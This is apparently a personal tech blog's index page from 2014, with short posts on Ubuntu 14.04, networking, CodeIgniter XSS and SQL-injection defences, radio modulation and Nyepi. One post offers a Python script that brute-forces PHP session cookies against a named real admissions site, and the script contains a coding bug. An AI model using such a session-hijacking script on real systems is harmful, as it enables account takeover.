Ubuntu 14.04 LTS released!

Finally, new Long Term Support (LTS) of Ubuntu released on 17th April, 2014. For those who upgrade its Ubuntu every single release and those who use only LTS release for the sake of stability and maturity, now you can do-release-upgrade via terminal or download Ubuntu Live Image from http://releases.ubuntu.com/trusty/ or your nearby mirror.

Cuplikan layar 2014-04-17 23:02:47

And now, wait for my next post for review. Hope this upgrade will run smoothly.

Script-Kiddey: Session ID Bruteforce with Python

Last year, I got a task to do some penetration testing with ujian.sbmptn.or.id. This site were used for Indonesia’s National Selection for Public University Admission (Seleksi Bersama Masuk Perguruan Tinggi Negeri, SBMPTN) registration. The first thing I did was to determine how this simple site react when we passed a bogus Session ID cookies (As usually I do).

Here I give you a tools to accomplish this. To use this thing, first determine the md5 checksum of normal site when it react with wrong session ID then put inside CHECKSUM variable. And don’t forget to analyse the format of your tested site’s session ID in the first place to determine site’s session ID pattern. In this script, It does with 26 alphanumeric (small case) character.

import httplib
import hashlib
import random
import string
import datetime

# Normal react web page's md5 checksum
CHECKSUM = "f98a1ee2197ee3e880f235236285ff58"

# Site
server = "ujian.sbmptn.or.id"
address = "/login.php"

f_success = open("success_token", "a")
f_fail = open("fail_token", "a")

success = 0
fail = 0

def do_exploit(phpsessid):
    global success, fail_token
    conn = httplib.HTTPConnection(server, timeout=10)
    
    try:
        conn.request("POST", address, "", {"Cookie": "PHPSESSID=" + phpsessid + "; path=/"})
        time = str(datetime.datetime.now())
        resp = conn.getresponse()
        data = resp.read()
        
        # MD5 Checksum
        md5 = hashlib.md5()
        md5.update(data)

        result = md5.hexdigest()
        if (CHECKSUM == result):
            fail = fail + 1
            f_fail.write(time + " " + phpsessid + "\n")
        else:
            success = success + 1
            f_success.write(time + " " + phpsessid + "\n")

    except:
        print "Something happened"

while 1:
    phpsessid = ''.join(random.choice(string.ascii_lowercase + string.digits) for x in range(26))
    do_exploit(phpsessid)

When you run this script, check a file called “f_success”. If it tells you something, then you may be found a working session ID you can replay/inject to.

How to digitally representing the text

In digital world, everything from text, media, and even the model of real world is represented through only by combination of 1 and 0. The foundation of complex modern computer and smart electronic appliances built from as simple as digital system gate like NAND gate which convert two binary input into one binary output. As NAND gate become smaller from a power-hungry lamp-sized vacuum tube to a bit micron of die in microprocessor, so do the size of computer and the processing power of it. The guy from 1940th might not imagine that post 2010 palm-sized computer can be used to do complex 3D rendering object, watching videos, and communicate each other through internet.

In this post, I will tell you how do the computer represent a text, from one character to hundred-pages of book.

Read More

Layering in Networking in a Nutshell: Down to Up (Part 1)

When you try to learn more about computer networking technology and its application, the first thing you have to know before getting started is to learn the basic part of computer networking layer. You have to know what stacking technology that backboned internet that you used to read my post on my blog. It need to be standardised, fully compatible and interoperable because it won’t be funny if your chat application only works in wired network and doesn’t work in the wireless one.

So in this post, I will tell you the story about how the layering inside networking works from the bottom to up and goes down again. There are two standard which defining every stack of computer network’s layer: OSI Layer and TCP/IP Layer. Both of them are lookalike. But in this reference, I will use the hybrid of two of them.

Read More

I saw this in Arstechnica…

Cuplikan layar 2014-04-03 21:51:48

I had my original Windows 8 license which came OEMly from my HP notebook. And you know what? It still plain and never updated since 4th semester (when the time I should learn .NET Framework using Visual Studio). This notebook still baking in Ubuntu Linux 12.04 LTS, My chimney smell Linux. :D

But I proud that Microsoft still hearing what user demands. It will be great update especially for user who don’t own any touchscreen.

Arstechnica – Future Windows 8.1 update will finally bring back the Start menu

CodeIgniter: Two action to prevent SQL Injection

In my previous post, I did explain to you about how to prevent XSS injection for your CodeIgniter Apps. And yet, for those who are novelty in web programming, I tell you the another kind of security hole in web programming which can be fatal because It can exposes your inner side of application’s database, it is SQL Injection.

Read More

CodeIgniter: Apply XSS filter as mandatory

If you are kind of novelty in web programming, and you have no idea what the XSS is, now I tell you what it is : “It is one kind of web application security hole that make use of unsanitized input so the intruder can input some Javascript/HTML in it”. And is it big deal? Yes, of course, because if they can do that, The malicious user input will be interpreted as real Javascript/HTML tag and therefore it will be processed/executed when it is printed.

Thankfully, CodeIgniter as one of PHP Application Framework which still gaining user base has a capability to deal with it. It has a XSS filtering mechanism which could be implemented to sanitized user input from GET/POST/Cookie data. If you want to use that, you just need to open CodeIgniter configuration file /application/config/config.php and edit this line :

$config['global_xss_filtering'] = TRUE;  # It is FALSE by default

And now if some adversary do inputting something like <script>alert(0);</script> inside of one of your application’s input, It will converted to be [removed]alert(0);[removed] so that it won’t be interpreted as a Javascript.

But remember, stick with using $this->input->post("variable") or $this->input->get("variable") when you are dealing with user input. Forget about that thing you learnt in first-time PHP class ($_POST[] or $_GET[]).

Wave, Radio and Modulation: How we send a data through radio wave

Some of you might still wondering how the radio communication actually works, how it can send/retrieve data and communication. Is it kind of some magic or someone bringing kind of telepathy technology into reality? Nope. If you are believing in science, it just normal physic-based technology that based from theory of wave. In this post, I will tell you a bit about theory of wave, radio and modulation from what I had learned from my Wireless Network class. This is very foundation of what you know as Wifi, Mobile Phone, Bluetooth, GSM, CDMA, LTE, etc works in today world.

Read More

Nyepi: The day of absolutely silence

Balinese and all of Indonesian Hindu (Hindu Dharma) adherent has an unique celebration called Nyepi. “Nyepi” in Indonesian/Balinese means “Silence”. Unlike many other celebration around the world which actually celebrating something by doing something big, like party, fest, or maybe crowd-gathering; In nyepi day, people just do a silence. They don’t go beyond home (with or without vehicle, unless of emergency), they don’t speak too loud, no entertainment (literally), and no working (also literally), no light and even electricity (literally). In this occasion, all family member just gathered together in their parents’ house.

Read More

Logitech Unifying Receiver on Ubuntu Linux

An hour ago, I bought a brand new wireless mouse namelly Logitech m235 (grey solid color). It is only 165.000 IDR (or ~15 USD) in some random local market. Previously, I had used two different kind of wireless mouse in different time: Logitech M185 which I bought around mid-2012 and broke its right click button (otherwise, it still works) and some random chinese brand wireless mouse + keyboard combo which I bought last month and suddenly broke its receiver. Wew.

Read More